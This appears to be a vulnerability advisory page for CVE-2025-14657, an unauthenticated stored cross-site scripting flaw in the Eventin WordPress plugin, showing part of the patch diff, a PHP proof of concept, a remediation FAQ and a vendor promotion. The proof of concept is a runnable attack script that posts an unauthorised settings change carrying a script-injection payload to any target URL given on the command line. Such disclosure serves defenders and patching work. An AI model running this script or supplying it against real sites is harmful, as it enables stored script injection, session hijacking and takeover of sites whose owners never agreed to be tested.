+         * Include and render the block
+         *
+         * @param   array  $attributes  Block attributes. Default empty array
+         * @param   string  $content     Block content. Default empty string
+         * @param   WP_Block  $block       Block instance
+         *
+         * @return  string Rendered block type output
+         */
+        protected function render($attributes, $content, $block)
+        {
+            $container_class = ! empty($attributes['containerClassName']) ? $attributes['containerClassName'] : '';
+            $styles          = ! empty($attributes['styles']) ? $attributes['styles'] : [];
+            $style_variant   = ! empty($attributes['styleVariant']) ? sanitize_key($attributes['styleVariant']) : 'style-1';
+
+            $allowed_variants = ['style-1', 'style-2'];
+            if (! in_array($style_variant, $allowed_variants, true)) {
+                $style_variant = 'style-1';
+            }

-        if ( $this->is_editor() ) {
-            $event_id = ! empty( $attributes['eventId'] ) ? intval( $attributes['eventId'] ) : 0;
+            if ($this->is_editor()) {
+                $event_id = ! empty($attributes['eventId']) ? intval($attributes['eventId']) : 0;

-            if ( $event_id == 0 ) {
-                $template = new EventinTemplateTemplateModel( get_the_ID() );
+                if ($event_id == 0) {
+                    $template = new EventinTemplateTemplateModel(get_the_ID());
+                    $event_id = $template->get_preview_event_id();
+                }
+            } else if ('etn-template' == get_post_type(get_the_ID())) {
+                $template = new EventinTemplateTemplateModel(get_the_ID());
                 $event_id = $template->get_preview_event_id();
+            } else {
+                $event_id = get_the_ID();
             }
-        } else if ( 'etn-template' == get_post_type( get_the_ID() ) ) {
-            $template = new EventinTemplateTemplateModel( get_the_ID() );
-            $event_id = $template->get_preview_event_id();
-        } else {
-            $event_id = get_the_ID();
-        }

-        $event = new Event_Model( $event_id );
+            $event = new Event_Model($event_id);

-        $event_banner = $event->event_banner;
+            $event_banner = $event->event_banner;

-        ob_start();
+            ob_start();
         ?>
-        <?php echo $this->render_frontend_css( $styles, $container_class ); ?>
         <?php
-        require_once Wpeventin::templates_dir() . 'event/parts/event-banner.php';
-        ?>
-
+            // Generate CSS with !important to override SCSS
+                    $frontend_css = $this->generate_frontend_css($styles, $container_class);
+                    if (! empty($frontend_css)) {
+                        // Add !important to common properties that need to override SCSS
+                        $important_properties = ['width', 'height', 'font-size', 'color', 'font-weight', 'line-height', 'letter-spacing', 'margin', 'padding', 'text-align', 'font-family', 'border-width', 'border-color', 'border-style', 'border-radius', 'z-index', 'box-shadow', 'left', 'right', 'top', 'bottom', 'position'];
+                        foreach ($important_properties as $prop) {
+                            $frontend_css = preg_replace(
+                                "/({$prop})s*:s*([^;!]+?)(?!s*!important)s*;/im",
+                                "$1: $2 !important;",
+                                $frontend_css
+                            );
+                        }
+                        echo '<style>' . $frontend_css . '</style>';
+                    }
+                ?>
         <?php
-        return ob_get_clean();
-    }
-}
-
+            $style_template = Wpeventin::templates_dir() . 'event/parts/styles/event-banner/' . $style_variant . '.php';
+                    require $style_template;
+                ?>
+        <?php
+            return ob_get_clean();
+                }
+        }
--- a/wp-event-solution/core/Blocks/BlockTypes/EventCategory.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/EventCategory.php
@@ -44,7 +44,7 @@

         ob_start();
         ?>
-        <?php echo $this->render_frontend_css( $styles, $container_class ); ?>
+        <?php echo $this->render_frontend_css( $styles, esc_attr( $container_class ) ); ?>
         <?php
         require_once Wpeventin::templates_dir() . 'event/parts/event-category.php';
         ?>
--- a/wp-event-solution/core/Blocks/BlockTypes/EventCountDownTimer.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/EventCountDownTimer.php
@@ -74,7 +74,7 @@

         ob_start();
         ?>
-        <?php echo $this->render_frontend_css( $styles, $container_class ); ?>
+        <?php echo $this->render_frontend_css( $styles, esc_attr( $container_class ) ); ?>
         <?php
         require_once Wpeventin::templates_dir() . 'event/parts/event-count-down-timer.php';
         ?>
--- a/wp-event-solution/core/Blocks/BlockTypes/EventDateTime.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/EventDateTime.php
@@ -1,69 +1,70 @@
 <?php
-namespace EventinBlocksBlockTypes;
+    namespace EventinBlocksBlockTypes;

-use EtnCoreEventEvent_Model;
-use EventinBlocksBlockTypesAbstractBlock;
-use Wpeventin;
-
-/**
- * Event Date Time Gutenberg block
- */
-class EventDateTime extends AbstractBlock {
-    /**
-     * Block name.
-     *
-     * @var string
-     */
-    protected $block_name = 'event-datetime';
+    use EtnCoreEventEvent_Model;
+    use EventinBlocksBlockTypesAbstractBlock;
+    use Wpeventin;

     /**
-     * Include and render the block
-     *
-     * @param   array  $attributes  Block attributes. Default empty array
-     * @param   string  $content     Block content. Default empty string
-     * @param   WP_Block  $block       Block instance
-     *
-     * @return  string Rendered block type output
+     * Event Date Time Gutenberg block
      */
-    protected function render( $attributes, $content, $block ) {
-        $container_class = ! empty( $attributes['containerClassName'] ) ? $attributes['containerClassName'] : '';
-        $styles = ! empty( $attributes['styles'] ) ? $attributes['styles'] : [];
-        $style_variant = ! empty( $attributes['styleVariant'] ) ? sanitize_key( $attributes['styleVariant'] ) : 'style-1';
-
-        $allowed_variants = [ 'style-1', 'style-2' ];
-        if ( ! in_array( $style_variant, $allowed_variants, true ) ) {
-            $style_variant = 'style-1';
-        }
-
-        if ( $this->is_editor() ) {
-            $event_id = ! empty( $attributes['eventId'] ) ? intval( $attributes['eventId'] ) : 0;
-        } else if ( 'etn-template' == get_post_type( get_the_ID() ) ) {
-            $template = new EventinTemplateTemplateModel( get_the_ID() );
-            $event_id = $template->get_preview_event_id();
-        } else {
-            $event_id = get_the_ID();
-        }
-
-        $event = new Event_Model( $event_id );
-        $date_format = etn_date_format();
-        $time_format = etn_time_format();
-
-        $start_date = $event->get_start_date( $date_format );
-        $start_time = $event->get_start_time( $time_format );
-        $end_date   = $event->get_end_date( $date_format );
-        $end_time   = $event->get_end_time( $time_format );
-        $timezone   = $event->get_timezone();
+    class EventDateTime extends AbstractBlock
+    {
+        /**
+         * Block name.
+         *
+         * @var string
+         */
+        protected $block_name = 'event-datetime';
+
+        /**
+         * Include and render the block
+         *
+         * @param   array  $attributes  Block attributes. Default empty array
+         * @param   string  $content     Block content. Default empty string
+         * @param   WP_Block  $block       Block instance
+         *
+         * @return  string Rendered block type output
+         */
+        protected function render($attributes, $content, $block)
+        {
+            $container_class = ! empty($attributes['containerClassName']) ? $attributes['containerClassName'] : '';
+            $styles          = ! empty($attributes['styles']) ? $attributes['styles'] : [];
+            $style_variant   = ! empty($attributes['styleVariant']) ? sanitize_key($attributes['styleVariant']) : 'style-1';
+
+            $allowed_variants = ['style-1', 'style-2', 'style-3'];
+            if (! in_array($style_variant, $allowed_variants, true)) {
+                $style_variant = 'style-1';
+            }
+
+            if ($this->is_editor()) {
+                $event_id = ! empty($attributes['eventId']) ? intval($attributes['eventId']) : 0;
+            } else if ('etn-template' == get_post_type(get_the_ID())) {
+                $template = new EventinTemplateTemplateModel(get_the_ID());
+                $event_id = $template->get_preview_event_id();
+            } else {
+                $event_id = get_the_ID();
+            }
+
+            $event       = new Event_Model($event_id);
+            $date_format = etn_date_format();
+            $time_format = etn_time_format();
+
+            $start_date = $event->get_start_date($date_format);
+            $start_time = $event->get_start_time($time_format);
+            $end_date   = $event->get_end_date($date_format);
+            $end_time   = $event->get_end_time($time_format);
+            $timezone   = $event->get_timezone();

-        ob_start();
+            ob_start();
         ?>
-        <?php echo $this->render_frontend_css( $styles, $container_class ); ?>
+        <?php echo $this->render_frontend_css( $styles, esc_attr( $container_class ) ); ?>
         <?php
-        $style_template = Wpeventin::templates_dir() . 'event/parts/styles/event-datetime/' . $style_variant . '.php';
-        require $style_template;
-        ?>
+            $style_template = Wpeventin::templates_dir() . 'event/parts/styles/event-datetime/' . $style_variant . '.php';
+                    require $style_template;
+                ?>

         <?php
-        return ob_get_clean();
-    }
-}
-
+            return ob_get_clean();
+                }
+            }
--- a/wp-event-solution/core/Blocks/BlockTypes/EventDescription.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/EventDescription.php
@@ -1,66 +1,67 @@
 <?php
-namespace EventinBlocksBlockTypes;
+    namespace EventinBlocksBlockTypes;

-use EtnCoreEventEvent_Model;
-use EventinBlocksBlockTypesAbstractBlock;
-use Wpeventin;
-
-/**
- * Event Description Gutenberg block
- */
-class EventDescription extends AbstractBlock {
-    /**
-     * Namespace for the block
-     *
-     * @var string
-     */
-    protected $namespace = 'eventin-pro';
-
-    /**
-     * Block name.
-     *
-     * @var string
-     */
-    protected $block_name = 'event-description';
+    use EtnCoreEventEvent_Model;
+    use EventinBlocksBlockTypesAbstractBlock;
+    use Wpeventin;

     /**
-     * Include and render the block
-     *
-     * @param   array  $attributes  Block attributes. Default empty array
-     * @param   string  $content     Block content. Default empty string
-     * @param   WP_Block  $block       Block instance
-     *
-     * @return  string Rendered block type output
+     * Event Description Gutenberg block
      */
-    protected function render( $attributes, $content, $block ) {
-        $container_class = ! empty( $attributes['containerClassName'] ) ? $attributes['containerClassName'] : '';
-        $styles = ! empty( $attributes['styles'] ) ? $attributes['styles'] : [];
-
-        if ( $this->is_editor() ) {
-            $event_id = ! empty( $attributes['eventId'] ) ? intval( $attributes['eventId'] ) : 0;
-
-            if ( $event_id == 0 ) {
-                $template = new EventinTemplateTemplateModel( get_the_ID() );
+    class EventDescription extends AbstractBlock
+    {
+        /**
+         * Namespace for the block
+         *
+         * @var string
+         */
+        protected $namespace = 'eventin-pro';
+
+        /**
+         * Block name.
+         *
+         * @var string
+         */
+        protected $block_name = 'event-description';
+
+        /**
+         * Include and render the block
+         *
+         * @param   array  $attributes  Block attributes. Default empty array
+         * @param   string  $content     Block content. Default empty string
+         * @param   WP_Block  $block       Block instance
+         *
+         * @return  string Rendered block type output
+         */
+        protected function render($attributes, $content, $block)
+        {
+            $container_class = ! empty($attributes['containerClassName']) ? $attributes['containerClassName'] : '';
+            $styles          = ! empty($attributes['styles']) ? $attributes['styles'] : [];
+
+            if ($this->is_editor()) {
+                $event_id = ! empty($attributes['eventId']) ? intval($attributes['eventId']) : 0;
+
+                if ($event_id == 0) {
+                    $template = new EventinTemplateTemplateModel(get_the_ID());
+                    $event_id = $template->get_preview_event_id();
+                }
+            } else if ('etn-template' == get_post_type(get_the_ID())) {
+                $template = new EventinTemplateTemplateModel(get_the_ID());
                 $event_id = $template->get_preview_event_id();
+            } else {
+                $event_id = get_the_ID();
             }
-        } else if ( 'etn-template' == get_post_type( get_the_ID() ) ) {
-            $template = new EventinTemplateTemplateModel( get_the_ID() );
-            $event_id = $template->get_preview_event_id();
-        } else {
-            $event_id = get_the_ID();
-        }

-        $event = new Event_Model( $event_id );
+            $event = new Event_Model($event_id);

-        ob_start();
+            ob_start();
         ?>
-        <?php echo $this->render_frontend_css( $styles, $container_class ); ?>
+        <?php echo $this->render_frontend_css( $styles, esc_attr( $container_class ) ); ?>
         <?php
-        require_once Wpeventin::templates_dir() . 'event/parts/event-description.php';
-        ?>
+            require Wpeventin::templates_dir() . 'event/parts/event-description.php';
+                ?>

         <?php
-        return ob_get_clean();
-    }
-}
-
+            return ob_get_clean();
+                }
+            }
--- a/wp-event-solution/core/Blocks/BlockTypes/EventFaq.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/EventFaq.php
@@ -26,10 +26,21 @@
      */
     protected function render( $attributes, $content, $block ) {
         $container_class = ! empty( $attributes['containerClassName'] ) ? $attributes['containerClassName'] : '';
-        $styles = ! empty( $attributes['styles'] ) ? $attributes['styles'] : [];
+        $styles          = ! empty( $attributes['styles'] ) ? $attributes['styles'] : [];
+        $style_variant   = ! empty( $attributes['styleVariant'] ) ? sanitize_key( $attributes['styleVariant'] ) : 'style-1';
+
+        $allowed_variants = ['style-1', 'style-2'];
+        if (! in_array($style_variant, $allowed_variants, true)) {
+            $style_variant = 'style-1';
+        }

         if ( $this->is_editor() ) {
             $event_id = ! empty( $attributes['eventId'] ) ? intval( $attributes['eventId'] ) : 0;
+
+            if ($event_id == 0) {
+                $template = new EventinTemplateTemplateModel(get_the_ID());
+                $event_id = $template->get_preview_event_id();
+            }
         } else if ( 'etn-template' == get_post_type( get_the_ID() ) ) {
             $template = new EventinTemplateTemplateModel( get_the_ID() );
             $event_id = $template->get_preview_event_id();
@@ -38,9 +49,25 @@
         }
         ob_start();
         ?>
-        <?php echo $this->render_frontend_css( $styles, $container_class ); ?>
         <?php
-        require_once Wpeventin::templates_dir() . 'event/parts/faq.php';
+            // Generate CSS with !important to override SCSS
+            $frontend_css = $this->generate_frontend_css($styles, $container_class);
+            if (! empty($frontend_css)) {
+                // Add !important to common properties that need to override SCSS
+                $important_properties = ['width', 'height', 'font-size', 'color', 'font-weight', 'line-height', 'letter-spacing', 'margin', 'padding', 'text-align', 'font-family', 'border-width', 'border-color', 'border-style', 'border-radius', 'z-index', 'box-shadow', 'left', 'right', 'top', 'bottom', 'position'];
+                foreach ($important_properties as $prop) {
+                    $frontend_css = preg_replace(
+                        "/({$prop})s*:s*([^;!]+?)(?!s*!important)s*;/im",
+                        "$1: $2 !important;",
+                        $frontend_css
+                    );
+                }
+                echo '<style>' . $frontend_css . '</style>';
+            }
+        ?>
+        <?php
+            $style_template = Wpeventin::templates_dir() . 'event/parts/styles/event-faq/' . $style_variant . '.php';
+            require $style_template;
         ?>
         <?php
         return ob_get_clean();
--- a/wp-event-solution/core/Blocks/BlockTypes/EventLogo.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/EventLogo.php
@@ -38,7 +38,7 @@
         }
         ob_start();
         ?>
-        <?php echo $this->render_frontend_css( $styles, $container_class ); ?>
+        <?php echo $this->render_frontend_css( $styles, esc_attr( $container_class ) ); ?>
         <?php
         require_once Wpeventin::templates_dir() . 'event/parts/logo.php';
         ?>
--- a/wp-event-solution/core/Blocks/BlockTypes/EventOrganizer.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/EventOrganizer.php
@@ -1,61 +1,84 @@
 <?php
-namespace EventinBlocksBlockTypes;
+    namespace EventinBlocksBlockTypes;

-use EtnCoreEventEvent_Model;
-use EventinBlocksBlockTypesAbstractBlock;
-use Wpeventin;
-
-/**
- * Event Organizer Gutenberg block
- */
-class EventOrganizer extends AbstractBlock {
-    /**
-     * Block name.
-     *
-     * @var string
-     */
-    protected $block_name = 'event-organizer';
+    use EtnCoreEventEvent_Model;
+    use EventinBlocksBlockTypesAbstractBlock;
+    use Wpeventin;

     /**
-     * Include and render the block
-     *
-     * @param   array  $attributes  Block attributes. Default empty array
-     * @param   string  $content     Block content. Default empty string
-     * @param   WP_Block  $block       Block instance
-     *
-     * @return  string Rendered block type output
+     * Event Organizer Gutenberg block
      */
-    protected function render( $attributes, $content, $block ) {
-        $container_class = ! empty( $attributes['containerClassName'] ) ? $attributes['containerClassName'] : '';
-        $styles = ! empty( $attributes['styles'] ) ? $attributes['styles'] : [];
+    class EventOrganizer extends AbstractBlock
+    {
+        /**
+         * Block name.
+         *
+         * @var string
+         */
+        protected $block_name = 'event-organizer';
+
+        /**
+         * Include and render the block
+         *
+         * @param   array  $attributes  Block attributes. Default empty array
+         * @param   string  $content     Block content. Default empty string
+         * @param   WP_Block  $block       Block instance
+         *
+         * @return  string Rendered block type output
+         */
+        protected function render($attributes, $content, $block)
+        {
+            $container_class = ! empty($attributes['containerClassName']) ? $attributes['containerClassName'] : '';
+            $styles          = ! empty($attributes['styles']) ? $attributes['styles'] : [];
+            $style_variant   = ! empty($attributes['styleVariant']) ? sanitize_key($attributes['styleVariant']) : 'style-1';
+
+            $allowed_variants = ['style-1', 'style-2'];
+            if (! in_array($style_variant, $allowed_variants, true)) {
+                $style_variant = 'style-1';
+            }

-        if ( $this->is_editor() ) {
-            $event_id = ! empty( $attributes['eventId'] ) ? intval( $attributes['eventId'] ) : 0;
+            if ($this->is_editor()) {
+                $event_id = ! empty($attributes['eventId']) ? intval($attributes['eventId']) : 0;

-            if ( $event_id == 0 ) {
-                $template = new EventinTemplateTemplateModel( get_the_ID() );
+                if ($event_id == 0) {
+                    $template = new EventinTemplateTemplateModel(get_the_ID());
+                    $event_id = $template->get_preview_event_id();
+                }
+            } else if ('etn-template' == get_post_type(get_the_ID())) {
+                $template = new EventinTemplateTemplateModel(get_the_ID());
                 $event_id = $template->get_preview_event_id();
+            } else {
+                $event_id = get_the_ID();
             }
-        } else if ( 'etn-template' == get_post_type( get_the_ID() ) ) {
-            $template = new EventinTemplateTemplateModel( get_the_ID() );
-            $event_id = $template->get_preview_event_id();
-        } else {
-            $event_id = get_the_ID();
-        }

-        $event = new Event_Model( $event_id );
+            $event = new Event_Model($event_id);

-        $event_organizers = $event->get_organizers();
+            $event_organizers = $event->get_organizers();

-        ob_start();
+            ob_start();
         ?>
-        <?php echo $this->render_frontend_css( $styles, $container_class ); ?>
         <?php
-        require_once Wpeventin::templates_dir() . 'event/parts/event-organizer.php';
-        ?>
-
+            // Generate CSS with !important to override SCSS
+                    $frontend_css = $this->generate_frontend_css($styles, $container_class);
+                    if (! empty($frontend_css)) {
+                        // Add !important to common properties that need to override SCSS
+                        $important_properties = ['width', 'height', 'font-size', 'color', 'font-weight', 'line-height', 'letter-spacing', 'margin', 'padding', 'text-align', 'font-family', 'border-width', 'border-color', 'border-style', 'border-radius', 'z-index', 'box-shadow', 'left', 'right', 'top', 'bottom', 'position'];
+                        foreach ($important_properties as $prop) {
+                            $frontend_css = preg_replace(
+                                "/({$prop})s*:s*([^;!]+?)(?!s*!important)s*;/im",
+                                "$1: $2 !important;",
+                                $frontend_css
+                            );
+                        }
+                        echo '<style>' . $frontend_css . '</style>';
+                    }
+                ?>
         <?php
-        return ob_get_clean();
-    }
-}
+            $style_template = Wpeventin::templates_dir() . 'event/parts/styles/event-organizer/' . $style_variant . '.php';
+                    require $style_template;
+                ?>

+        <?php
+            return ob_get_clean();
+                }
+            }
--- a/wp-event-solution/core/Blocks/BlockTypes/EventRSVP.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/EventRSVP.php
@@ -44,9 +44,9 @@
         }
         ob_start();

-
+
         ?>
-        <?php echo $this->render_frontend_css( $styles, $container_class ); ?>
+        <?php echo $this->render_frontend_css( $styles, esc_attr( $container_class ) ); ?>
         <?php
         require_once Wpeventin::templates_dir() . 'event/parts/rsvp.php';
         ?>
--- a/wp-event-solution/core/Blocks/BlockTypes/EventSchedule.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/EventSchedule.php
@@ -1,70 +1,98 @@
 <?php
-namespace EventinBlocksBlockTypes;
+    namespace EventinBlocksBlockTypes;

-use EtnCoreEventEvent_Model;
-use EventinBlocksBlockTypesAbstractBlock;
-use Wpeventin;
-
-/**
- * Event Schedule Gutenberg block
- */
-class EventSchedule extends AbstractBlock {
-    /**
-     * Block name.
-     *
-     * @var string
-     */
-    protected $block_name = 'event-schedule';
+    use EtnCoreEventEvent_Model;
+    use EventinBlocksBlockTypesAbstractBlock;
+    use Wpeventin;

     /**
-     * Include and render the block
-     *
-     * @param   array  $attributes  Block attributes. Default empty array
-     * @param   string  $content     Block content. Default empty string
-     * @param   WP_Block  $block       Block instance
-     *
-     * @return  string Rendered block type output
+     * Event Schedule Gutenberg block
      */
-    protected function render( $attributes, $content, $block ) {
-        $container_class = ! empty( $attributes['containerClassName'] ) ? $attributes['containerClassName'] : '';
-        $styles = ! empty( $attributes['styles'] ) ? $attributes['styles'] : [];
+    class EventSchedule extends AbstractBlock
+    {
+        /**
+         * Block name.
+         *
+         * @var string
+         */
+        protected $block_name = 'event-schedule';
+
+        /**
+         * Include and render the block
+         *
+         * @param   array  $attributes  Block attributes. Default empty array
+         * @param   string  $content     Block content. Default empty string
+         * @param   WP_Block  $block       Block instance
+         *
+         * @return  string Rendered block type output
+         */
+        protected function render($attributes, $content, $block)
+        {
+            $container_class = ! empty($attributes['containerClassName']) ? $attributes['containerClassName'] : '';
+            $styles          = ! empty($attributes['styles']) ? $attributes['styles'] : [];
+            $style_variant   = ! empty($attributes['styleVariant']) ? sanitize_key($attributes['styleVariant']) : 'style-1';
+
+            $allowed_variants = ['style-1', 'style-2', 'style-3'];
+            if (! in_array($style_variant, $allowed_variants, true)) {
+                $style_variant = 'style-1';
+            }

-        if ( $this->is_editor() ) {
-            $event_id = ! empty( $attributes['eventId'] ) ? intval( $attributes['eventId'] ) : 0;
+            if ($this->is_editor()) {
+                $event_id = ! empty($attributes['eventId']) ? intval($attributes['eventId']) : 0;

-            if ( $event_id == 0 ) {
-                $template = new EventinTemplateTemplateModel( get_the_ID() );
+                if ($event_id == 0) {
+                    $template = new EventinTemplateTemplateModel(get_the_ID());
+                    $event_id = $template->get_preview_event_id();
+                }
+            } else if ('etn-template' == get_post_type(get_the_ID())) {
+                $template = new EventinTemplateTemplateModel(get_the_ID());
                 $event_id = $template->get_preview_event_id();
+            } else {
+                $event_id = get_the_ID();
             }
-        } else if ( 'etn-template' == get_post_type( get_the_ID() ) ) {
-            $template = new EventinTemplateTemplateModel( get_the_ID() );
-            $event_id = $template->get_preview_event_id();
-        } else {
-            $event_id = get_the_ID();
-        }

-        $event = new Event_Model( $event_id );
-        $event_location = $event->get_address();
+            $event          = new Event_Model($event_id);
+            $event_location = $event->get_address();

-        ob_start();
+            ob_start();
         ?>
-        <?php echo $this->render_frontend_css( $styles, $container_class ); ?>
         <?php
-        require_once Wpeventin::templates_dir() . 'event/parts/event-schedule.php';
-        ?>
-
+            // Generate CSS with !important to override SCSS
+                    $frontend_css = $this->generate_frontend_css($styles, $container_class);
+                    if (! empty($frontend_css)) {
+                        // Add !important to common properties that need to override SCSS
+                        // Note: Properties are already converted to kebab-case in generate_device_css
+                        $important_properties = ['width', 'height', 'font-size', 'color', 'font-weight', 'line-height', 'letter-spacing', 'margin', 'padding', 'text-align', 'font-family', 'border-width', 'border-color', 'border-style', 'border-radius', 'z-index', 'box-shadow', 'left', 'right', 'top', 'bottom', 'position'];
+                        foreach ($important_properties as $prop) {
+                            // Match property with optional whitespace, value (can contain spaces and multiple values), and semicolon
+                            // Avoid matching if !important already exists
+                            // Use multiline flag and handle whitespace properly
+                            $frontend_css = preg_replace(
+                                "/({$prop})s*:s*([^;!]+?)(?!s*!important)s*;/im",
+                                "$1: $2 !important;",
+                                $frontend_css
+                            );
+                        }
+                        echo '<style>' . $frontend_css . '</style>';
+                    }
+                ?>
         <?php
-        return ob_get_clean();
-    }
+            $style_template = Wpeventin::templates_dir() . 'event/parts/styles/event-schedule/' . $style_variant . '.php';
+                    require $style_template;
+                ?>

-    /**
-     * Get the editor style handle for this block type.
-     *
-     * @see $this->register_block_type()
-     * @return string|null
-     */
-    protected function get_block_type_editor_style() {
-        return 'etn-public-css';
-    }
-}
+        <?php
+            return ob_get_clean();
+                }

+                /**
+                 * Get the editor style handle for this block type.
+                 *
+                 * @see $this->register_block_type()
+                 * @return string|null
+                 */
+                protected function get_block_type_editor_style()
+                {
+                    return 'etn-public-css';
+                }
+        }
--- a/wp-event-solution/core/Blocks/BlockTypes/EventSocial.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/EventSocial.php
@@ -1,53 +1,61 @@
 <?php
-namespace EventinBlocksBlockTypes;
+    namespace EventinBlocksBlockTypes;

-use EtnCoreEventEvent_Model;
-use EventinBlocksBlockTypesAbstractBlock;
-use Wpeventin;
-
-/**
- * Event Social Gutenberg block
- */
-class EventSocial extends AbstractBlock {
-    /**
-     * Block name.
-     *
-     * @var string
-     */
-    protected $block_name = 'event-social';
+    use EtnCoreEventEvent_Model;
+    use EventinBlocksBlockTypesAbstractBlock;
+    use Wpeventin;

     /**
-     * Include and render the block
-     *
-     * @param   array  $attributes  Block attributes. Default empty array
-     * @param   string  $content     Block

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14657 - Eventin – Event Manager, Event Booking, Calendar, Tickets and Registration Plugin (AI Powered) <= 4.0.51 - Missing Authorization to Unauthenticated Stored Cross-Site Scripting via 'post_settings'

<?php
/**
 * Proof of Concept for CVE-2025-14657
 * Unauthenticated Stored XSS in Eventin WordPress Plugin <= 4.0.51
 *
 * Usage: php poc.php http://target-wordpress-site.com
 */

$target_url = isset($argv[1]) ? rtrim($argv[1], '/') : '';

if (empty($target_url)) {
    echo "Usage: php poc.php http://target-wordpress-site.comn";
    exit(1);
}

// REST API endpoint for plugin settings
$api_endpoint = $target_url . '/wp-json/eventin/v1/settings';

// Malicious payload for etn_primary_color parameter
// This injects JavaScript that will execute when CSS is loaded
$payload = 'red;}</style><script>alert(`XSS via CVE-2025-14657: ${document.domain}`)</script><style>';

// Prepare the malicious settings update
$post_data = [
    'etn_primary_color' => $payload,
    'etn_secondary_color' => '#000000',
    'action' => 'settings'
];

// Initialize cURL session
$ch = curl_init();

// Configure cURL options
curl_setopt($ch, CURLOPT_URL, $api_endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WP-Nonce: ' . uniqid() // Nonce is not validated in vulnerable versions
]);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check response
if ($http_code === 200) {
    echo "[+] SUCCESS: Settings updated with XSS payloadn";
    echo "[+] Payload injected into etn_primary_color settingn";
    echo "[+] JavaScript will execute when any page loads Eventin stylesn";
    echo "[+] Visit any page with Eventin elements to trigger the payloadn";
    
    // Verify the injection by checking the CSS output
    $css_url = $target_url . '/wp-content/plugins/wp-event-solution/build/css/event-manager-public.css';
    echo "[+] Check CSS at: $css_urln";
} else {
    echo "[-] FAILED: HTTP $http_coden";
    echo "[-] Response: $responsen";
    echo "[-] Target may be patched or plugin not activen";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-14657?
Overview of the vulnerability
CVE-2025-14657 is a high-severity vulnerability in the Eventin WordPress plugin, versions 4.0.51 and earlier. It allows unauthenticated attackers to modify plugin settings and inject malicious scripts, leading to stored cross-site scripting (XSS) attacks.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a missing authorization check in the plugin’s REST API, allowing unauthenticated requests to modify settings. Attackers can exploit this by sending specially crafted POST requests to inject malicious JavaScript, which executes when users load pages that utilize Eventin styles.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Eventin plugin version 4.0.51 or earlier is vulnerable. Administrators should check their installed plugin versions to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Eventin plugin installed. If it is version 4.0.51 or earlier, your site is at risk. Additionally, you can review the plugin’s settings and API access logs for any unauthorized changes.
How can I fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Eventin plugin to version 4.0.52 or later, where the issue has been patched. Ensure you also review your site’s security settings and consider implementing additional security measures, such as web application firewalls.
What does the CVSS score of 7.2 indicate?
Understanding the severity rating
A CVSS score of 7.2 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. Administrators should prioritize addressing this vulnerability to prevent potential exploitation.
What are the practical risks associated with this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to session hijacking, administrative account takeover, content defacement, or malware distribution. Since the payload is stored, it can affect all visitors to the site until the settings are manually corrected.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can send a malicious payload to the plugin’s settings endpoint without authentication. This payload can inject JavaScript that executes in the context of any user viewing the affected pages, showcasing the vulnerability’s impact.
What steps should I take after updating the plugin?
Post-update recommendations
After updating the plugin, review your site’s security practices, including user permissions and access controls. Monitor your site for any unusual activity and consider conducting a security audit to identify any other potential vulnerabilities.
Is there a way to prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, regularly update all plugins and themes, use security plugins to monitor for vulnerabilities, and conduct periodic security audits. Additionally, implement strict access controls and input validation to minimize risks.
What should I do if I suspect my site has been compromised?
Response to potential exploitation
If you suspect your site has been compromised, immediately take it offline to prevent further damage. Investigate the extent of the breach, restore from a clean backup, and consider consulting with a security professional for a thorough assessment.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-14657 can be found on the official CVE database, security blogs, and the plugin’s repository. Staying informed about security updates and vulnerabilities is essential for maintaining a secure WordPress environment.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations